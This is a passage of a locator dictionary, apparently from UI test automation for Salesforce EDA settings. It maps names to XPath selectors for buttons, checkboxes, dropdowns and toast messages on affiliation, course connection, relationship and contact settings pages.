"//th[@data-label='Affiliation Key']/../descendant::a[@title='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "administrative_account": "//div/a[text()='{} Administrative Account']", "contact_edit": "//a[@title='Edit']", "en_re_type_validation": "(//div/span[text()='Record Type Validation']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "ert_validation": "//span/img[@class='affl-record-type-enforced checked' and @alt='True']", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "delete_rec_affl": "//span/img[@class='delete-prog-enroll checked' and @alt='True']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "del_rel_affl": "(//div/span[text()='Delete Related Affiliation When Deleting Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "specify_r_checkbox": "(//div/span[text()='Specify Role for Created Affiliations']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "un_copy_affl_end_date": "//span/img[@class='copy-end-date unchecked' and @alt='False']", "copy_affliation_end_checkbox": "(//div/span[text()='Copy Affiliation End Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "copy_affliation_start_checkbox": "(//div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "settings_tab": "(//li[@class='slds-tabs__item slds-text-heading--label slds-active' and @role='tab' and @title='Settings'])[1]/a[contains(text(),'Settings')]", "affl_mappings_tab": "//a[contains(text(),'Affiliation Mappings')]", "default_checkbox": "//div[text()='{}']/following-sibling::div/descendant::img", "enable_checkbox": "(//div[text()='{}']/following-sibling::div/descendant::span)[1]", "dropdown_field": "//div[text()='{}']/following-sibling::div/select", "action_button": "//button[text()='{}']", "update_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "add_setting_button": "//span[text()='{}']/../following-sibling::button/span[text()='{}']", }, "eda_settings_new": { "global_action": "//button[text()='{}']", "edc_header": "//h2[contains(@class, 'header')]/descendant::span[text()='{}']", "toast_message": "//div[contains(@class, 'slds-theme--success slds-notify--toast slds-notify slds-notify--toast forceToastMessage')]/descendant::span[text()='{}']", "custom_toast": "//div[contains(@class, 'forceToastMessage')]/descendant::span[contains(@class, 
'toastMessage')]", "settings_nav_title": "//div[@data-qa-locator='edaSettingsNavigation']/descendant::a[text()='{}']", "dropdown_input": "//label[text()='{}']/../descendant::button[contains(@class, 'slds-combobox__input')]", "settings_dropdown": "//label[text()='{}']/../descendant::span[text()='{}']", "select_from_list": "//div[text()='{}']/../following-sibling::div/descendant::div[contains(@class, 'list__options')]/descendant::span[text()='{}']", "move_to_selected": "//div[text()='{}']/../following-sibling::div/descendant::button[@type='button' and @title='Move selection to Selected Account Record Types']", "tell_me_more": "//div[text()='{}']/../descendant::a[text()='{}']", "toggle_status": "//span[text()='{}']/../ancestor::lightning-input", "toggle_input": "//span[text()='{}']/../descendant::span[contains(@id, 'toggle')]", "update_button": "//div[text()='{}']/../parent::div/descendant::button[text()='{}']", "footer_button": "//div[contains(@class, 'footer')]/descendant::button[@title='{}']", "app_tile": "//h2[text()='{}']/../descendant::ul/descendant::*[self::div or self::span][text()='{}']", "show_actions_button": "//tr[@data-row-key-value='{}']/descendant::span[text()='Show actions']/ancestor::button[@type='button']", "actions_menu": "//tr[@data-row-key-value='{}']/descendant::span[text()='{}']/ancestor::a[@role='menuitem']", }, "eda_settings_cc": { "default_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div/descendant::img", "dropdown_values": "//div[text()='{}']/following-sibling::div/select/option[text()='{}']", "dropdown_values_count": "//div[text()='{}']/following-sibling::div/select/option", "enable_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div[1]/descendant::span", "enable_cc_warning_enabled": "//div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "enable_cc_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "updated_dropdown_value": "//div[text()='{}']/following-sibling::div/descendant::span[text()='{}']", "settings_tab": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='Settings']", "backfill_warning_enabled": "//div[contains(@class, 'slds-notify--alert')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "backfill_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "cc_sub_tabs": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='{}']", "backfill_button_status": "//span[text()='{}']/parent::button", "backfill_checkbox_status": "//input[contains(@class, 'backfill')]/following-sibling::span[contains(@class, 'checkbox')]", "backfill_checkbox": "//span[text()='I understand and am ready to run Backfill.']/../span[contains(@class, 'checkbox')]", "backfill_toast": "//div[@id='backFillToast']/descendant::span[text()='{}']", }, "eda_settings_program_plans": { "checkbox_read": "(//span[text()='{}']/../following-sibling::div/descendant::img)[1]", "checkbox_edit": "(//span[text()='{}']/../following-sibling::div/descendant::span)[1]", "updated_checkbox_edit": 
"//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", }, "eda_settings_affiliations": { "acc_rec_type_edit": "//span[text()='Acc Record Type: {}']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", "acc_rec_type_cleared": "//span[text()='Acc Record Type: ']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", }, "eda_settings_courses": { "text_message": "//span[text()='{}']", }, "eda_settings_accounts_contacts": { "checkbox": "//span[text()='{}']/following::div[1]/descendant::span[text()='{}']/parent::label/span[contains(@class, 'checkbox')]", "checkbox_value": "//span[text()='{}']/following::label[1][contains(@class, 'checkbox')]/span[contains(@class, 'checkbox')]", "checkbox_list": "//span[text()='{}']/../../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "checkbox_list_read": "//span[text()='{}']/../../following-sibling::div[1]/descendant::img", "dropdown_acc": "//span[text()='{}']/../following-sibling::div[1]/select/option[text()='{}']", }, "eda_settings_relationships": { "dropdown_read": "//span[text()='{}']/../following-sibling::div[1]/descendant::span", "dropdown_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[text()='{}']", "new_reciprocal_setting": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']/following::input[1]", "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "active_checkbox": "//span[text()='{}']/following::input[contains(@class, 'new-rec-sett')]/../span[contains(@class, 'checkbox')]", "add_setting_button": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']", "settings_count": "//span[contains(@class, 'Checkbox')]/img[contains(@class, 'rec-settg')]", "new_settings": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'rec-settg-{}') and text()='{}']", "new_setting_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'rec-settg-{}')]/../label/span[text()='{}: {}']", "new_setting_checkbox": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::img[contains(@class, 'rec-settg-{}')]", "new_setting_checkbox_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::input[contains(@class, 'rec-settg-{}')]/../span[contains(@class, 'checkbox')]", "delete_setting_icon": "//span[text()='{}: {}']/following::lightning-icon[1][contains(@class, 'delete')]", "removed_setting": "//span[contains(@class, 'rec-settg-{}') and text()='{}']", "removed_autoc_setting": "//span[contains(@class, 'autoc-settg-{}') and text()='{}']", "updtate_setting_name": "//span[text()='Name: {}']/../following-sibling::input[contains(@class, 'rec-settg-{}')]", "update_setting_name_cleared": "//span[text()='Name: ']/../following-sibling::input[contains(@class, 'rec-settg-name')]", "update_setting_rest": "(//span[text()='Name: {}']/following::input[contains(@class, 'rec-settg-{}')])[1]", "updated_setting": "//span[contains(@class, 'rec-settg-name') and text()='{}']/following::div/span[contains(@class, 'rec-settg-{}') and text()='{}']", "test_locator": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-2]/descendant::input[contains(@class, 'rec-settg-neutral')]", "new_autocreate_setting": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::input[1]", 
"campaign_type_textarea": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::textarea", "new_settings_autoc": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'autoc-settg-{}') and text()='{}']", "new_autoc_setting_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", "new_campaign_types_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::textarea[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", }, "eda_settings_system": { "default_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::img", "default_dropdown_value": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[text()='{}']", "admin_success_toast": "//div[@id='adminSuccessToast']/descendant::h2", "hh_success_toast": "//div[@id='hhSuccessToast']/descendant::h2", "other_accname_format": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::input", "other_dropdown_value": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::span[text()='{}']", "recipient_type_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[@value='{}']", "recipient_name": "//label[text()='{}']/../div/descendant::input", "recipient_lookup": "//div[contains(@class, 'lookup') and text()='{}']", }, "account_types": { "administrative": "//span[contains(text(),'Administrative')]/parent::*", "household": "//span[text()='Household Account']/preceding-sibling::span", "account_checkbox": "//div[contains(@class,'slds-form-element__control')]//span[contains(text(),'{}')]", "save": "//button[contains(@class, 'slds-button')]/span[text()='Save']/..", "edit": "//button[contains(@class, 'slds-button')]/span[text()='Edit']/..", "cancel": "//button[contains(@class, 'slds-button')]/span[text()='Cancel']/..", }, "contact": { "new_button": "//a[@title='New']//div[@title='New']", "first_name": "//input[contains(@class,'firstName')]", "last_name": "//input[contains(@class,'lastName')]", "save_button": "//button[@title='Save']", "program_enrollment_new_button": "//div[contains(@class, 'windowViewMode-normal')]//span[text()='Program Enrollments']/following-sibling::span[@title='(0)']/ancestor::header/following-sibling::div/descendant::a[@title='New']", }, "program_plans": { "program_plan": "(//a[@title='Program Plans'])[2]/span/span", "new_button": "//a[@title='New']//div[@title='New']/..", "pp_name": "//div//div//div//div//div//div//div//label//span[contains(text(), 'Program Plan Name')]//../following-sibling::input", "save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", }, "plan_requirement": { "error": "//div[contains(@class, 'pageLevelErrors')]/descendant::li[text()='{}']", "parent_plan_req_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Parent Plan Requirement']/../following-sibling::div/descendant::span[text()='{}']", "plan_requirement_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Plan Requirement Name']/../following-sibling::input", "program_plan_name": "//td/a[@title='{}']", "program_plan": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Program Plan']/../following-sibling::div/descendant::span[text()='{}']", "delete_field": "//div[contains(@class, 
'slds-modal__container')]/descendant::span[text()='{}']/../following-sibling::div/descendant::span[text()='{}']/following-sibling::a[@class='deleteAction']", "toast_message": "//lightning-icon[contains(@class, 'toastIcon') and contains(@class, 'slds-icon-utility-success')]", }, "course_offering": { "search_courses": "//div/input[@title='Search Courses']", "new_button": "//a[@title='New']//div[@title='New']/..", "new_course_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Course')]", "save_button": "(//span[@class=' label bBody' and text()='Save']/ancestor::button[contains(@class, 'slds-button')])[3]", "next_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "final_save_button": "(//span[@class=' label bBody' and text()='Save'])[3]/ancestor::button", }, "settings_health_check": { "run_health_check_button": "//button[@title='{}']", "health_check_header": "//h2[contains(@class, 'header')]/span[text()='{}']", "last_run_date": "//button[@title='Run Health Check']/preceding::div[1]", "expand_button": "//button[@title='Expand these results' and contains(@aria-controls, '{}')]", "all_checks_status": "//div[text()='{}']/following-sibling::div/div[contains(@class, 'text')]", "status_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::td/preceding-sibling::th[@data-label='Status']/descendant::lightning-base-formatted-text", "recommended_fix_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::tr/descendant::td[@data-label='Recommended Fix']/descendant::lightning-base-formatted-text", }, "term": { "new_term_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Term')]//..", "save_button": "(//span[@class=' label bBody' and contains(text(), 'Save')])[5]/..", "account": "//div//input[@title='Search Accounts']", "search_terms": "//input[@title='Search Terms']", "course_offering_id": "//span[contains(text(), 'Course Offering ID')]//../following-sibling::input", }, "custom_settings": { "hierarchy_settings": "//a[text()='Hierarchy Settings']", "manage": "//span/input[@value='Manage']", "no_records": "//table//td[text()='No records to display.']", "custom_settings_frame": "//iframe[contains(@title,'Custom Settings ~ Salesforce')]", "custom_settings_definition": "//iframe[contains(@title,'Custom Setting Definition ~ Salesforce')]", "custom_settings_h_settings": "//iframe[contains(@title,'Custom Setting Hierarchy Settings ~ Salesforce')]", }, "new_account": "//span[@title='New Account']", "new_account_next_button": "//button[contains(@class, 'slds-button')]//span[@class=' label bBody' and text()='Next']", "new_account_name": "//label/span[text()='Account Name']/following-sibling::span/following::input[1]", "new_account_save_button": "//div[contains(@class, 'slds-modal__footer')]/descendant::button[@title='Save']", "account_record_type": "//span[contains(text(), '{}')]", "new_program_enrollment_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "affiliated_accounts_count": "//span[text()='Affiliated Accounts']/following-sibling::span[contains(@title, '(1)')]", "custom_settings_title": "//a/mark[text()='{}']", "program_enrollments_count": "//span[text()='Program Enrollments']/following-sibling::span[contains(@title, '(1)')]", "programenrollment_account": 
"//div[@class='autocompleteWrapper slds-grow']//input[@class=' default input uiInput uiInputTextForAutocomplete uiInput--default uiInput--input uiInput uiAutocomplete uiInput--default uiInput--lookup']", "list_of_departments": "//button[contains(@class, 'slds-button slds-button--neutral')]//span[@class=' label bBody' and text()='Next']", "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "account_list": '//tbody/tr/th[.//span[contains(@class, "slds-grid")]]/descendant::a[text()="{}"]', "header_field_value": '//*[contains(@class, "slds-page-header__detail")][.//*[@title="{}"]]//*[text()="{}"]', "modal": { "checkbox": '//div[contains(@class,"uiInputCheckbox")]/label/span[text()="{}"]/../following-sibling::input[@type="checkbox"]', "save": "//div[contains(@class, 'footer') or contains(@class, 'Footer')]/descendant::button[@title='Save']", }, "accounts_contacts_settings_locators": { "copy_from": "//select[@class='contact-preferred-phone-picklist-input-select select uiInput uiInputSelect uiInput--default uiInput--select']", "disable_checked": "(//span[text()='Disable Preferred Phone enforcement']/following::div/div/div/label/input/following-sibling::span)[1]", "disable_preferred_phone": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear": "//div/span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "enhanced_preferred_set": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='True']", "enhanced_preferred_set_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "preferred_phone_active": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='True']", }, "relationships_settings_locators": { "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", }, "contacts_locators": { "contact_save": "//div[contains(@class,'modal-footer')]//button[@title='Save']//span[text()='Save']", "header": "//a[@title='Contacts']//span", "select_contact": "//a[@title='{} {}']", "preferred_phone": "//span//span[contains(text(),'Preferred Phone')]", "preferred_phone_home_dropdown": "//span//span[contains(text(),'Preferred Phone')]/following::span/following::a", "preferred_tab": "//div[@class='select-options']/descendant::a[@title='Home Phone']", "phone_verify_has_number": "(//div//span[text()='Phone']/../following-sibling::div//span[not( text()='123-123-1234')])[1]", "preferred_error_message": "//li[contains(text(), 'The phone selected for Preferred Phone can')]", "which_preferred_error_message": "//li[contains(text(), 'Tell us which Phone is preferred.')]", "field_for_work_phone": "//div//label//span[contains(text(),'Work Phone')]/../following-sibling::input", "which_footer_cancel": "//div[contains(@class,'footer')]/button[@title='Cancel']//span[text()='Cancel']", "footer_save": "//div[contains(@class,'modal-footer')]//span[text()='Save']", "accounts_contacts": "//a[contains(text(),'Accounts and Contacts')]", "details_tab": "//div[contains(@class,'normal')]//span[@class='title' and 
text()='Details']", "phone_home": "//span[text()='Home Phone']/../following-sibling::input", "run_cleanup": "//button[text()='Run Cleanup']", "phone_verify": "//div//span[text()='Home Phone']/../following-sibling::div//span//span[text()='123-123-1234']", "home_phone_verify": "//span[text()='Home Phone']/../following::div//span//span[text()='123-123-1234']", "successful_run": "//span[text()='The process was queued successfully. An email will be sent at the completion of the job.']", "apex_jobs": "//a/mark[text()='{}']", "primary_business_organization": "(//span[text()='Primary Business Organization']/following::div/div/div/div/input[@title='Search Accounts'])[1]", "button_save_affiliation": "//button[@title='Save']//span[text()='Save']", "delete_icon": "//span[@class='deleteIcon']", }, "affiliations_locators": { "header": "//a[@title='EDA Settings']//span", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit": "//button[contains(@class, 'slds-button') and @type='button']/span[text()='Edit']/..", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "sub_tab": "//div[@id='afflTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "affiliations_former": "//div/div/following::div/span[text()='Former']", "affiliations_student": "(//div/div/span[@class='uiOutputText' and text()='Role Specified for Created Affiliations']/following::div[@class='slds-col slds-size--1-of-2'])[1]/span[text()='Student']", "affiliations_current": "//div/div/following::div[@class='slds-col slds-size--1-of-2']/span[text()='Current']", "account_record_type_academic_program": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Academic Program']", "contact_primary_affl_field_primary_academic_program": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Academic Program']", "auto_enroll_academic_program": "//div/span[text()='Primary Academic Program']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enrollment_edit_mode_status_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Status: Current']/following::input)[1]", "ae_em_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", 
"auto_enrollment_edit_mode_role_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Role: Student']/following::input)[1]", "ae_em_role_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "auto_enrollment_read_mode_status_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='Current']", "auto_enrollment_read_mode_role_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='Student']", "account_record_type_business_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Business Organization']", "contact_primary_affl_field_primary_business_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Business Organization']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "ae_em_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "auto_enrollment_edit_mode_role_business_organization": "(//span[text()='Primary Affl Field: Primary Business Organization']/../../../following-sibling::div/following-sibling::div/following-sibling::div//span[text()='Role: ']/following::input)[1]", "ae_em_pbo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "auto_enrollment_read_mode_status_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "ae_enroll_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "auto_enrollment_read_mode_role_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ae_enroll_bo_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_educational_institution": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Educational Institution']", "contact_primary_affl_field_primary_educational_institution": 
"//span[@class='mapping-affl-field uiOutputText' and text()='Primary Educational Institution']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ei_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ei_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ei_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ed_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_household_account": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Household Account']", "contact_primary_affl_field_primary_household": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Household']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ha_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid 
slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ha_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ha_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ha_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_sports_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Sports Organization']", "contact_primary_affl_field_primary_sports_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Sports Organization']", "auto_enroll_sports_organization": "//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "so_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "pso_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid 
slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "so_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "so_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", 